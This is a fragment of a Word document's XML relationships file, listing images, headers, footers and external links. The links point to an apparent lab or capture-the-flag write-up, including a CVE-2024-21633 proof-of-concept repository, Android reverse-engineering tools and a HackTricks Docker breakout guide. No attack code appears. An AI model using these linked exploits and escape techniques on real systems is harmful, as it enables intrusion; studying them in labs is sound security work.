      <w:szCs w:val="2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2.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image12.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header2.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer1.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header3.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/MrIkso/ArscEditor/releases/download/1.0.2/ArscEditor-1.0.2-all.jar" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer3.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/MrIkso/ArscEditor/releases/download/1.0.2/ArscEditor-1.0.2-all.jar" TargetMode="External"/><Relationship Id="rId45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14.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21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hyperlink" Target="https://app.hackingclub.com/laboratory/competition-machines/227" TargetMode="External"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png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6.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/MobSF/Mobile-Security-Framework-MobSF" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/MobSF/Mobile-Security-Framework-MobSF" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image23.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/0x33c0unt/CVE-2024-21633" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/0x33c0unt/CVE-2024-21633" TargetMode="External"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/tools/apktool/" TargetMode="External"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/index.html#mounting-disk---poc1" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/tools/apktool/" TargetMode="External"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/simplificator/phonegap-helloworld/raw/refs/heads/master/android/bin/Hello%20World.apk" TargetMode="External"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/docker-security/docker-breakout-privilege-escalation/index.html#mounting-disk---poc1" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/simplificator/phonegap-helloworld/raw/refs/heads/master/android/bin/Hello%20World.ap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4.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25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